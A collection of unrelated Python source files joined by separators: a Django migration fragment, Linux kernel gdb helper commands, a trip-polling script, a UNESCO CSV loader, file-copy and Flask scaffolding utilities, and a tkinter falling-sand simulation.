            min_pay_pct=b_a.min_pay_pct,
            min_pay_dlr=b_a.min_pay_dlr,
            priority=b_a.priority)
    for b_s in b_Statement.objects.using(db_alias).all():
        d_Statement.objects.using(db_alias).create(
            id=b_s.id,
            user=b_s.user,
            account_id=b_s.account_id,
            year=b_s.year,
            month=b_s.month,
            balance=b_s.balance)
class Migration(migrations.Migration):
    # Data migration: copies budget-app rows into the debt app.
    # Reversing is a no-op (the copied rows are left in place).

    dependencies = [
        ('debt', '0001_initial'),
    ]

    operations = [
        migrations.RunPython(copy_data_to_debt_app, migrations.RunPython.noop),
    ]
|
#
# gdb helper commands and functions for Linux kernel debugging
#
# Kernel proc information reader
#
# Copyright (c) 2016 Linaro Ltd
#
# Authors:
# Kieran Bingham <kieran.bingham@linaro.org>
#
# This work is licensed under the terms of the GNU GPL version 2.
#
import gdb
from linux import constants
from linux import utils
from linux import tasks
from linux import lists
from struct import *
class LxCmdLine(gdb.Command):
    """ Report the Linux Commandline used in the current kernel.
        Equivalent to cat /proc/cmdline on a running target"""

    def __init__(self):
        super(LxCmdLine, self).__init__("lx-cmdline", gdb.COMMAND_DATA)

    def invoke(self, arg, from_tty):
        # saved_command_line already carries the full boot command line;
        # just print it with a trailing newline.
        gdb.write(gdb.parse_and_eval("saved_command_line").string() + "\n")

# Register the command with gdb at import time.
LxCmdLine()
class LxVersion(gdb.Command):
    """ Report the Linux Version of the current kernel.
        Equivalent to cat /proc/version on a running target"""

    def __init__(self):
        super(LxVersion, self).__init__("lx-version", gdb.COMMAND_DATA)

    def invoke(self, arg, from_tty):
        # linux_banner should contain a newline
        gdb.write(gdb.parse_and_eval("(char *)linux_banner").string())

# Register the command with gdb at import time.
LxVersion()
# Resource Structure Printers
# /proc/iomem
# /proc/ioports
def get_resources(resource, depth):
    """Yield (resource, depth) pairs in pre-order.

    Walks a kernel resource tree: each node is visited first, then its
    child subtree one level deeper, then the next sibling at the same
    level.  The sibling chain is followed iteratively; only children
    recurse.
    """
    node = resource
    while node:
        yield node, depth
        child = node['child']
        if child:
            for entry in get_resources(child, depth + 1):
                yield entry
        node = node['sibling']
def show_lx_resources(resource_str):
    """Print a /proc/iomem- or /proc/ioports-style resource listing.

    resource_str names a kernel root resource (e.g. "iomem_resource");
    each descendant is printed as "start-end : name", indented two
    spaces per tree level.
    """
    resource = gdb.parse_and_eval(resource_str)
    # Port ranges fit in 4 hex digits, memory ranges need 8.
    width = 4 if resource['end'] < 0x10000 else 8
    # Iterate straight to the first child
    for res, depth in get_resources(resource['child'], 0):
        start = int(res['start'])
        end = int(res['end'])
        gdb.write(" " * depth * 2 +
                  "{0:0{1}x}-".format(start, width) +
                  "{0:0{1}x} : ".format(end, width) +
                  res['name'].string() + "\n")
class LxIOMem(gdb.Command):
    """Identify the IO memory resource locations defined by the kernel

Equivalent to cat /proc/iomem on a running target"""

    def __init__(self):
        super(LxIOMem, self).__init__("lx-iomem", gdb.COMMAND_DATA)

    def invoke(self, arg, from_tty):
        # Delegate to the shared resource-tree printer.
        return show_lx_resources("iomem_resource")

# Register the command with gdb at import time.
LxIOMem()
class LxIOPorts(gdb.Command):
    """Identify the IO port resource locations defined by the kernel

Equivalent to cat /proc/ioports on a running target"""

    def __init__(self):
        super(LxIOPorts, self).__init__("lx-ioports", gdb.COMMAND_DATA)

    def invoke(self, arg, from_tty):
        # Delegate to the shared resource-tree printer.
        return show_lx_resources("ioport_resource")

# Register the command with gdb at import time.
LxIOPorts()
# Mount namespace viewer
# /proc/mounts
def info_opts(lst, opt):
    """Concatenate the option strings whose flag bits are set in opt.

    lst maps a flag bit to its textual form (e.g. ",noatime"); the
    pieces are joined in the mapping's iteration order.
    """
    return "".join(text for flag, text in lst.items() if opt & flag)
# Superblock flag bits -> the option text shown in /proc/mounts output.
FS_INFO = {constants.LX_SB_SYNCHRONOUS: ",sync",
           constants.LX_SB_MANDLOCK: ",mand",
           constants.LX_SB_DIRSYNC: ",dirsync",
           constants.LX_SB_NOATIME: ",noatime",
           constants.LX_SB_NODIRATIME: ",nodiratime"}

# Per-mount flag bits -> the option text shown in /proc/mounts output.
MNT_INFO = {constants.LX_MNT_NOSUID: ",nosuid",
            constants.LX_MNT_NODEV: ",nodev",
            constants.LX_MNT_NOEXEC: ",noexec",
            constants.LX_MNT_NOATIME: ",noatime",
            constants.LX_MNT_NODIRATIME: ",nodiratime",
            constants.LX_MNT_RELATIME: ",relatime"}

# Cached gdb type for `struct mount`, and a pointer to it, used when
# walking the namespace's mount list below.
mount_type = utils.CachedType("struct mount")
mount_ptr_type = mount_type.get_type().pointer()
class LxMounts(gdb.Command):
    """Report the VFS mounts of the current process namespace.

Equivalent to cat /proc/mounts on a running target
An integer value can be supplied to display the mount
values of that process namespace"""

    def __init__(self):
        super(LxMounts, self).__init__("lx-mounts", gdb.COMMAND_DATA)

    # Equivalent to proc_namespace.c:show_vfsmnt
    # However, that has the ability to call into s_op functions
    # whereas we cannot and must make do with the information we can obtain.
    def invoke(self, arg, from_tty):
        argv = gdb.string_to_argv(arg)
        if len(argv) >= 1:
            # NOTE(review): int() raises ValueError, not gdb.error, so a
            # non-numeric argument propagates uncaught -- confirm intent.
            try:
                pid = int(argv[0])
            except gdb.error:
                raise gdb.GdbError("Provide a PID as integer value")
        else:
            pid = 1  # default to init's namespace

        task = tasks.get_task_by_pid(pid)
        if not task:
            raise gdb.GdbError("Couldn't find a process with PID {}"
                               .format(pid))

        namespace = task['nsproxy']['mnt_ns']
        if not namespace:
            raise gdb.GdbError("No namespace for current process")

        # One /proc/mounts-style line per mount in the namespace.
        for vfs in lists.list_for_each_entry(namespace['list'],
                                             mount_ptr_type, "mnt_list"):
            devname = vfs['mnt_devname'].string()
            devname = devname if devname else "none"

            # Build the mount-point path by walking mnt_parent links up
            # to the root (which is its own parent).
            pathname = ""
            parent = vfs
            while True:
                mntpoint = parent['mnt_mountpoint']
                pathname = utils.dentry_name(mntpoint) + pathname
                if (parent == parent['mnt_parent']):
                    break
                parent = parent['mnt_parent']

            if (pathname == ""):
                pathname = "/"

            superblock = vfs['mnt']['mnt_sb']
            fstype = superblock['s_type']['name'].string()
            s_flags = int(superblock['s_flags'])
            m_flags = int(vfs['mnt']['mnt_flags'])
            rd = "ro" if (s_flags & constants.LX_SB_RDONLY) else "rw"

            gdb.write(
                "{} {} {} {}{}{} 0 0\n"
                .format(devname,
                        pathname,
                        fstype,
                        rd,
                        info_opts(FS_INFO, s_flags),
                        info_opts(MNT_INFO, m_flags)))

# Register the command with gdb at import time.
LxMounts()
class LxFdtDump(gdb.Command):
    """Output Flattened Device Tree header and dump FDT blob to the filename
       specified as the command argument. Equivalent to
       'cat /proc/fdt > fdtdump.dtb' on a running target"""

    def __init__(self):
        super(LxFdtDump, self).__init__("lx-fdtdump", gdb.COMMAND_DATA,
                                        gdb.COMPLETE_FILENAME)

    def fdthdr_to_cpu(self, fdt_header):
        """Return the 7 header words byte-swapped to host order.

        FDT headers are big-endian on the wire; repack them through the
        target's endianness so the fields read correctly here.
        """
        fdt_header_be = ">IIIIIII"
        fdt_header_le = "<IIIIIII"

        if utils.get_target_endianness() == 1:
            output_fmt = fdt_header_le
        else:
            output_fmt = fdt_header_be

        return unpack(output_fmt, pack(fdt_header_be,
                                       fdt_header['magic'],
                                       fdt_header['totalsize'],
                                       fdt_header['off_dt_struct'],
                                       fdt_header['off_dt_strings'],
                                       fdt_header['off_mem_rsvmap'],
                                       fdt_header['version'],
                                       fdt_header['last_comp_version']))

    def invoke(self, arg, from_tty):
        if not constants.LX_CONFIG_OF:
            raise gdb.GdbError("Kernel not compiled with CONFIG_OF\n")

        # Optional argument: output filename.
        if len(arg) == 0:
            filename = "fdtdump.dtb"
        else:
            filename = arg

        py_fdt_header_ptr = gdb.parse_and_eval(
            "(const struct fdt_header *) initial_boot_params")
        py_fdt_header = py_fdt_header_ptr.dereference()

        fdt_header = self.fdthdr_to_cpu(py_fdt_header)

        # Sanity-check the magic word before trusting totalsize below.
        if fdt_header[0] != constants.LX_OF_DT_HEADER:
            raise gdb.GdbError("No flattened device tree magic found\n")

        gdb.write("fdt_magic:         0x{:02X}\n".format(fdt_header[0]))
        gdb.write("fdt_totalsize:     0x{:02X}\n".format(fdt_header[1]))
        gdb.write("off_dt_struct:     0x{:02X}\n".format(fdt_header[2]))
        gdb.write("off_dt_strings:    0x{:02X}\n".format(fdt_header[3]))
        gdb.write("off_mem_rsvmap:    0x{:02X}\n".format(fdt_header[4]))
        gdb.write("version:           {}\n".format(fdt_header[5]))
        gdb.write("last_comp_version: {}\n".format(fdt_header[6]))

        # Copy totalsize bytes of the blob out of target memory and dump
        # them to the requested file.
        inf = gdb.inferiors()[0]
        fdt_buf = utils.read_memoryview(inf, py_fdt_header_ptr,
                                        fdt_header[1]).tobytes()

        try:
            f = open(filename, 'wb')
        except gdb.error:
            raise gdb.GdbError("Could not open file to dump fdt")

        f.write(fdt_buf)
        f.close()

        gdb.write("Dumped fdt blob to " + filename + "\n")

# Register the command with gdb at import time.
LxFdtDump()
|
from mysql import connector
import mysql.connector.errors
from urllib2 import urlopen
import json
# Accumulators shared by getTripId()/getTripData() below.
trip_ids=[]
trip_details={}
#db connection object
# NOTE(review): credentials are hard-coded -- acceptable only for a
# throwaway local script.
conn = connector.connect(host='localhost',user='root',passwd='root',db='cubito')
cursor = conn.cursor()
#get trip ids
def getTripId():
    """Fetch two trip ids from the remote endpoint and insert them.

    Appends each JSON response to the module-level trip_ids list, then
    inserts every trip_id into the `trips` table and commits once.
    """
    for id in range(0,2):
        trip_ids.append(json.load(urlopen("http://cubito.co.in/assignment/gpslocation.php")))
    for trip_id in trip_ids:
        # SECURITY FIX: the original built the INSERT by string
        # concatenation, which breaks on quotes and invites SQL
        # injection; use a parameterized query instead.
        cursor.execute("insert into trips (trip_id) values(%s)",
                       (trip_id["trip_id"],))
    conn.commit()
    #print trip_id["trip_id"]
def getTripData():
    """Poll each known trip until its status leaves RUNNING (Python 2).

    Re-fetches the trip's JSON in a busy loop; `key` just counts the
    polls for the progress prints.
    """
    cursor.execute("select trip_id from trips limit 2")
    #ids= cursor.fetchall()
    # Uses the in-memory list instead of the fetched rows.
    ids = trip_ids
    #print ids
    for trip_id in ids:
        print trip_id
        key=1
        trip_detail = json.load(urlopen("http://cubito.co.in/assignment/gpslocation.php?trip_id="+trip_id["trip_id"]))
        # Busy-wait until the service stops reporting RUNNING.
        # NOTE(review): no sleep between polls -- hammers the endpoint.
        while(trip_detail["trip_id"]==trip_id["trip_id"] and trip_detail["status"]=="RUNNING"):
            trip_detail = json.load(urlopen("http://cubito.co.in/assignment/gpslocation.php?trip_id="+trip_id["trip_id"]))
            print str(trip_detail["status"])+str(key)
            #trip_details[trip_detail["lastupdate"]] =
            #print trip_detail["location"]
            if(trip_detail["status"]=="COMPLETED"):
                trip_detail["status"]="COMPLETED"
                print str(key)+"completed"
            key=key+1
# Script entry: fetch the trip ids, then poll each trip to completion.
getTripId()
getTripData()
import csv # https://docs.python.org/3/library/csv.html
# https://django-extensions.readthedocs.io/en/latest/runscript.html
# python3 manage.py runscript many_load
from unesco.models import Category, States, Region, Iso, Site
def run():
    """Load unesco/load.csv into the unesco app tables.

    Wipes Category/States/Region/Iso/Site, then inserts one Site per CSV
    row, creating the lookup rows on demand.  Numeric cells that fail to
    parse are stored as None.

    Fixes over the original: the CSV file is closed via a context
    manager, the four copy-pasted try/except blocks are collapsed into
    one helper, and the bare `except:` clauses (which also swallowed
    KeyboardInterrupt/SystemExit) now catch only conversion errors.
    """
    def _parse(cast, text):
        # Return cast(text), or None for empty/malformed cells.
        try:
            return cast(text)
        except (TypeError, ValueError):
            return None

    with open('unesco/load.csv') as fhand:
        reader = csv.reader(fhand)
        next(reader)  # Advance past the header

        # Start from a clean slate on every load.
        Category.objects.all().delete()
        States.objects.all().delete()
        Region.objects.all().delete()
        Iso.objects.all().delete()
        Site.objects.all().delete()

        # Format
        # name,description,justification,year,longitude,latitude,area_hectares,category,states,region,iso
        for row in reader:
            print(row)
            cat, created = Category.objects.get_or_create(name=row[7])
            s, created = States.objects.get_or_create(name=row[8])
            reg, created = Region.objects.get_or_create(name=row[9])
            iso, created = Iso.objects.get_or_create(name=row[10])

            site = Site(name=row[0], description=row[1], justification=row[2],
                        year=_parse(int, row[3]),
                        longitude=_parse(float, row[4]),
                        latitude=_parse(float, row[5]),
                        area_hectares=_parse(float, row[6]),
                        category=cat, state=s, region=reg, iso=iso)
            site.save()
|
#!/usr/bin/python2
#-*- coding:utf-8 -*-
import shutil
import os
import os.path
import sys
def cp60(args,dirname,filename):
    """os.path.walk callback (Python 2): de-prefix thumbnail copies.

    For every file named 'snap_60X60_<name>' in `dirname`, copy it to
    '<name>' in the same directory (metadata preserved via copy2).
    `args` is unused (walk passes it through).
    """
    for i in filename:
        try:
            if i.startswith('snap_60X60_'):
                fn = i.replace('snap_60X60_','')
                src = dirname + '/' + i
                des= dirname+'/'+fn
                print 'from:%s to:%s' %(src,des)
                shutil.copy2(src,des)
        except Exception as e:
            # NOTE(review): the message is misleading -- startswith()
            # cannot raise; any exception here comes from copy2 (I/O).
            print "error,filename not startswith snap"
            pass
# Walk the directory named on the command line (Python 2 os.path.walk).
if len(sys.argv) > 1:
    os.path.walk(sys.argv[1],cp60,None)
|
from os.path import expanduser
import os
import shutil
# The user's home directory (boilerplate source) and the directory the
# command is being run from (where the app is created).
HOME = expanduser('~')
CWD = os.getcwd()
def run():
    """Scaffold a new flask app by copying the boilerplate tree.

    Copies ~/.new-flask-app/boilerplate into ./app under the current
    working directory.
    """
    print('Creating your flask application...')
    source = HOME + '/.new-flask-app/boilerplate'
    destination = CWD + '/' + 'app'
    shutil.copytree(source, destination)
    print('The application was created!')
|
import tkinter as tk
import random
import time
class MainWindow:
    """Tkinter front-end for the falling-sand simulation.

    Owns the canvas, the element selector, the FPS label and the game
    loop; delegates all physics to a World instance.

    BUG FIX: the original timed frames with time.clock(), which was
    removed in Python 3.8 (and measured CPU time, not wall time, on
    Unix).  All timing now uses time.perf_counter().
    """

    def __init__(self, root):
        self.root = root
        #root = tk.Tk()
        # Performance counters displayed in the HUD label.
        self.frameCount = 0
        self.frameRate = 0
        self.physicsTime = 0
        self.paintTime = 0
        self.totalProcessTime = 0
        self.PIXEL_SIZE = 5
        self.WINDOW_SIZE = 700
        self.selectedElement = 0
        # World contains the particles and does the physics; it knows
        # nothing about graphics.
        self.world = World(self.WINDOW_SIZE, self.PIXEL_SIZE)
        self.initGui()
        # Schedules itself via root.after, so this kicks off the loop.
        self.gameLoop(root)
        self.root.mainloop()  # Tkinter event loop

    def initGui(self):
        """Build the frame, canvas, element spinbox and FPS label."""
        self.frame = tk.Frame(bg="white")
        self.frame.pack()
        self.canvas = tk.Canvas(self.frame, bg="black", width=self.WINDOW_SIZE, height=self.WINDOW_SIZE)
        self.canvas.pack()
        self.elementSbox = tk.Spinbox(self.frame, from_=0, to=6, repeatdelay=100, repeatinterval=100, command=self.newElementSelected)
        self.elementSbox.pack()
        self.frameRateL = tk.Label(self.frame, text="0", font=("Helvetica", 10), anchor="nw")
        self.frameRateL.pack(side=tk.LEFT)
        # Click and drag both paint the selected element.
        self.canvas.bind("<Button-1>", self.canvasClicked)
        self.canvas.bind("<B1-Motion>", self.canvasClicked)

    def gameLoop(self, root):
        """Run one physics step + repaint, update stats, reschedule."""
        print("Loop")
        tt0 = time.perf_counter()   # start total timer
        pht0 = time.perf_counter()  # time physics calcs
        self.world.updateWorld()
        pht1 = time.perf_counter()
        pt0 = time.perf_counter()   # time paint calcs
        self.paint(self.world)
        pt1 = time.perf_counter()
        tt1 = time.perf_counter()
        self.frameCount += 1
        self.physicsTime = pht1 - pht0
        self.paintTime = pt1 - pt0
        self.totalProcessTime = tt1 - tt0
        # +0.01 guards against division by zero on very fast frames.
        self.frameRate = 1.0/(self.totalProcessTime + 0.01)
        self.frameRateL.config(text = "FPS:" + str(self.frameRate) + "\n" + "Phys Time:" + str(self.physicsTime*1000) + "\n" + "Paint Time:" + str(self.paintTime*1000) + "\n" + "Total Time:" + str(self.totalProcessTime*1000))
        # Re-arm the loop ~10ms from now (keep the handle for cancel).
        self.job = self.root.after(10, self.gameLoop, root)

    def paint(self, world):
        """Redraw every non-empty tile as a colored rectangle."""
        print("Paint")
        self.canvas.delete(tk.ALL)
        # pType -> fill color (0/air is simply not drawn).
        for x in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
            for y in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
                if world.particleArray[x][y].pType == 1:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#F0C002")
                elif world.particleArray[x][y].pType == 64:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "white")
                elif world.particleArray[x][y].pType == 2:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "grey")
                elif world.particleArray[x][y].pType == 3:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "blue")
                elif world.particleArray[x][y].pType == 4:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#8C3A00")
                elif world.particleArray[x][y].pType == 5:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#BDEEFF") #Light bluish grey
                elif world.particleArray[x][y].pType == 6:
                    self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#2BA6CF")

    def canvasClicked(self, event):
        """Translate a click to tile coordinates and add a particle."""
        print("CLick: " + str(event.x) + ", " + str(event.y))
        # Snap the pixel coordinate down to its tile index.
        xTile = (event.x - (event.x % self.PIXEL_SIZE)) / self.PIXEL_SIZE
        yTile = (event.y - (event.y % self.PIXEL_SIZE)) / self.PIXEL_SIZE
        self.world.addParticle(int(xTile), int(yTile), int(self.selectedElement))

    def newElementSelected(self):
        """Spinbox callback: remember the chosen element index."""
        self.selectedElement = int(self.elementSbox.get())
#--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
class World:
    """Grid of particles plus the per-step physics update.

    The grid is (WINDOW_SIZE/PIXEL_SIZE) squared; its outer ring is
    filled with Boundary particles (pType 64) so nothing falls out.
    """

    def __init__(self, WINDOW_SIZE, PIXEL_SIZE):
        #Stores classes to be instantiated (Use to get correct Particle sublclass given pType #)
        self.Elements = [Air,Sand,Stone,Water,Oil,Ice,Spout]
        self.WINDOW_SIZE = WINDOW_SIZE
        self.PIXEL_SIZE = PIXEL_SIZE
        # Grid starts entirely as Air (Elements[0]).
        self.particleArray = [[self.Elements[0](x,y,0) for y in range(int(WINDOW_SIZE/PIXEL_SIZE))] for x in range(int(WINDOW_SIZE/PIXEL_SIZE))]
        #Fill boundary with stone so elements dont fall out of bouds (need logic to make out of bounds particles dissapear)
        for x in range(int(WINDOW_SIZE/PIXEL_SIZE)):
            self.particleArray[x][int(WINDOW_SIZE/PIXEL_SIZE) - 1] = Boundary(x,int(WINDOW_SIZE/PIXEL_SIZE) - 1,64)#64 as type so that its not printed as stone
            self.particleArray[x][0] = Boundary(x,0,64)#64 as type so that its not printed as stone
        for y in range(int(WINDOW_SIZE/PIXEL_SIZE)):
            self.particleArray[int(WINDOW_SIZE/PIXEL_SIZE) - 1][y] = Boundary(int(WINDOW_SIZE/PIXEL_SIZE) - 1, y,64)#64 as type so that its not printed as stone
            self.particleArray[0][y] = Boundary(0, y,64)#64 as type so that its not printed as stone

    #Simulate next step
    def updateWorld(self):
        """Advance the simulation one tick.

        First pass updates every movable particle that has not already
        moved this tick (movedFlag prevents double-moves when a particle
        is swapped forward into not-yet-visited cells); second pass
        clears all movedFlags for the next tick.
        """
        print("Update")
        for x in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
            for y in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
                # Skip Air (0), Boundary (64) and already-moved cells.
                if self.particleArray[x][y].pType != 0 and self.particleArray[x][y].pType != 64 and self.particleArray[x][y].movedFlag is False:
                    self.particleArray[x][y].update(self.particleArray, self.surroundingParticles(x,y))
        for x in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
            for y in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
                self.particleArray[x][y].movedFlag = False

    def addParticle(self, x, y, selectedElement):
        """Place a new particle of the selected element at tile (x, y)."""
        print("Add")
        self.particleArray[x][y] = self.Elements[selectedElement](x, y, selectedElement)

    #move this to particle maybe
    def surroundingParticles(self, x, y):
        """Return the 8 neighbours of (x, y) in fixed order.

        Indexing (relative to X):
            0 1 2
            3 X 4
            5 6 7
        Assumes (x, y) is not on the boundary ring, so x±1/y±1 are
        always in range.
        """
        particleList = []
        particleList.append(self.particleArray[x-1][y-1])
        particleList.append(self.particleArray[x][y-1])
        particleList.append(self.particleArray[x+1][y-1])
        particleList.append(self.particleArray[x-1][y])
        particleList.append(self.particleArray[x+1][y])
        particleList.append(self.particleArray[x-1][y+1])
        particleList.append(self.particleArray[x][y+1])
        particleList.append(self.particleArray[x+1][y+1])
        return particleList
#--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
class Particle:
    """Base class for every grid cell: shared state plus gravity logic.

    Subclasses override the property flags (gravity/isSolid/isPowder/
    isLiquid/density) and optionally particleLogic() for element-specific
    behavior.

    BUG FIX: __init__ previously ignored its movedFlag parameter and
    always assigned False; it now honors the argument (default remains
    False, so existing callers behave identically).
    """

    def __init__(self, x = 0, y = 0, pType = 0, movedFlag = False):
        self.x = x
        self.y = y
        self.pType = pType
        # True once this particle has moved during the current tick.
        self.movedFlag = movedFlag
        # Class lookup used by addParticle(); mirrors World.Elements.
        self.Elements = [Air,Sand,Stone,Water,Oil,Ice,Spout]
        # Default Properties
        self.gravity = 1        # 1 normal gravity, -1 floating, 0 immovable
        self.isSolid = False    # immovable objects such as stone
        self.isPowder = False   # powders sink below all liquids and stack
        self.isLiquid = False   # liquids stack/float by density
        self.density = 1.0      # 1.0 behaves like a powder: always sinks

    def update(self, particleArray, neighbourList):
        """Apply gravity (when enabled) then element-specific logic."""
        if self.gravity != 0:
            self.updateGravity(particleArray, neighbourList)
        self.particleLogic(particleArray, neighbourList)

    def updateGravity(self, particleArray, neighbourList):
        """Fall into the cell below, or slide diagonally when blocked.

        neighbourList indexing: 5/6/7 are below-left / below / below-right.
        """
        # Boundary below: nothing to do.
        if neighbourList[6].pType == 64:
            pass
        # Air below, or a less dense liquid: sink straight down.
        elif neighbourList[6].pType == 0 or neighbourList[6].density < self.density:
            self.swap(self.x, self.y, neighbourList[6].x, neighbourList[6].y, particleArray)
        # Out-of-bounds marker (reserved; 64 currently doubles for this).
        elif neighbourList[6].pType == 63:
            self.replaceWithAir()
        # Blocked below (powder/solid/denser): try the diagonals.
        elif neighbourList[6].isPowder or neighbourList[6].isSolid or neighbourList[6].density >= self.density:
            # Density comparison (rather than an air check) lets a liquid
            # slide through a less dense liquid too.
            if neighbourList[5].density < self.density and neighbourList[7].density < self.density:
                # Both diagonals open: pick one at random to avoid bias.
                if random.randint(0,1) == 1:
                    self.swap(self.x, self.y, neighbourList[5].x, neighbourList[5].y, particleArray)
                else:
                    self.swap(self.x, self.y, neighbourList[7].x, neighbourList[7].y, particleArray)
            elif neighbourList[5].density < self.density:
                self.swap(self.x, self.y, neighbourList[5].x, neighbourList[5].y, particleArray)
            elif neighbourList[7].density < self.density:
                self.swap(self.x, self.y, neighbourList[7].x, neighbourList[7].y, particleArray)

    def particleLogic(self, particleArray, neighbourList):
        """Hook for element-specific behavior; default does nothing."""
        pass

    def swap(self, initX, initY, finX, finY, particleArray):
        """Exchange this particle with the one at (finX, finY).

        Both particles are marked moved so neither is updated again this
        tick; their stored coordinates and array slots are exchanged.
        """
        self.movedFlag = True
        particleArray[finX][finY].movedFlag = True
        tempX = particleArray[finX][finY].x
        particleArray[finX][finY].x = self.x
        self.x = tempX
        tempY = particleArray[finX][finY].y
        particleArray[finX][finY].y = self.y
        self.y = tempY
        temp = particleArray[finX][finY]
        particleArray[finX][finY] = particleArray[initX][initY]
        particleArray[initX][initY] = temp

    def addParticle(self, x, y, pType, particleArray):
        """Instantiate the element class for pType at (x, y)."""
        particleArray[x][y] = self.Elements[pType](x,y,pType)

    # Dont use, only chenges type not class -- the object stays whatever
    # subclass it was, so its behavior does not become Air's.
    def replaceWithAir(self):
        self.pType = 0
#-----------------------------------------------------------------------------------------------------
#maybe have a liquid and powder class (extended from particle) which respective elements extend,
class Air(Particle):
    """Empty space: intangible, weightless and never simulated."""
    def __init__(self, x, y, pType = 0, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        # Air has no material properties at all.
        self.density = 0.0
        self.gravity = 0
        self.isLiquid = False
        self.isPowder = False
        self.isSolid = False
    def update(self, particleArray, neighbourList):
        """Air never moves or reacts, so skip the generic update entirely."""
        pass
class Sand(Particle):
    """Classic falling powder: pulled by gravity, piles rather than flows."""
    def __init__(self, x, y, pType = 1, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        # Powder flags: falls and slides but is not a rigid solid.
        self.density = 1.0
        self.gravity = 1
        self.isLiquid = False
        self.isPowder = True
        self.isSolid = False
class Stone(Particle):
    """Immovable solid terrain block."""
    def __init__(self, x, y, pType = 2, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        #Overridden property variables
        self.gravity = 0
        self.isSolid = True
        self.isPowder = False
        self.isLiquid = False
        # Fix: every other solid (Ice, Spout) sets density = 1.0, but Stone
        # previously inherited Particle's default, so the density comparisons
        # in the generic update treated stone inconsistently.
        self.density = 1.0
class Water(Particle):
    """Falling liquid of density 0.5 that levels itself sideways."""
    def __init__(self, x, y, pType = 3, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        # Liquid flags and material properties.
        self.density = 0.5
        self.gravity = 1
        self.isLiquid = True
        self.isPowder = False
        self.isSolid = False
    def particleLogic(self, particleArray, neighbourList):
        """When water (pType 3) sits on one side and air (pType 0) on the
        other, hop toward the air cell so the surface levels out.

        Assumes neighbourList[3] and neighbourList[4] are the two
        horizontal neighbours -- TODO confirm the neighbour indexing.
        """
        nbr_a = neighbourList[3]
        nbr_b = neighbourList[4]
        if nbr_a.pType == 3 and nbr_b.pType == 0:
            self.swap(self.x, self.y, nbr_b.x, nbr_b.y, particleArray)
        elif nbr_b.pType == 3 and nbr_a.pType == 0:
            self.swap(self.x, self.y, nbr_a.x, nbr_a.y, particleArray)
class Oil(Particle):
    """Light liquid (density 0.1); denser fluids sink through it under the
    generic density rules."""
    def __init__(self, x, y, pType = 4, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        self.density = 0.1
        self.gravity = 1
        self.isLiquid = True
        self.isPowder = False
        self.isSolid = False
class Ice(Particle):
    """Static solid that slowly freezes adjacent water."""
    def __init__(self, x, y, pType = 5, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        self.density = 1.0
        self.gravity = 0
        self.isLiquid = False
        self.isPowder = False
        self.isSolid = True
    def particleLogic(self, particleArray, neighbourList):
        """Each tick, every neighbouring water cell (pType 3) independently
        has a 1-in-101 chance of being turned into ice (pType 5)."""
        for neighbour in neighbourList:
            if neighbour.pType == 3 and random.randint(0, 100) == 0:
                self.addParticle(neighbour.x, neighbour.y, 5, particleArray)
class Spout(Particle):
    """Fixed solid that randomly emits water into the empty cell below."""
    def __init__(self, x, y, pType = 6, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        self.density = 1.0
        self.gravity = 0
        self.isLiquid = False
        self.isPowder = False
        self.isSolid = True
    def particleLogic(self, particleArray, neighbourList):
        """With probability 1/11 per tick, spawn water (pType 3) at (x, y+1)
        when the cell below (neighbourList[6]) is air."""
        below = neighbourList[6]
        if below.pType == 0 and random.randint(0, 10) == 0:
            self.addParticle(self.x, self.y + 1, 3, particleArray)
class Boundary(Particle):
    """Out-of-bounds sentinel cell; never simulated.

    NOTE(review): Boundary defaults to pType 64, but the out-of-bounds
    branch in the generic update compares against pType 63 -- confirm
    which value is intended.
    """
    def __init__(self, x, y, pType = 64, movedFlag = False):
        Particle.__init__(self, x, y, pType, movedFlag)
        self.density = 1.0
        self.gravity = 0
        self.isLiquid = False
        self.isPowder = False
        self.isSolid = False
    def update(self, particleArray, neighbourList):
        """Boundary cells never change; skip the generic update."""
        pass
#--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Entry point
def main():
    """Create the Tk root window and hand it to the application shell."""
    root = tk.Tk()
    app = MainWindow(root)
    # NOTE(review): no root.mainloop() call here -- presumably MainWindow
    # starts the Tk event loop itself; confirm.

if __name__ == "__main__":
    main()
|
# (BINARY SEARCH ON THE ANSWER) O(N log d), d = span of stall positions
# Cow Stalls problem (a.k.a. SPOJ AGGRCOW / "Aggressive Cows"):
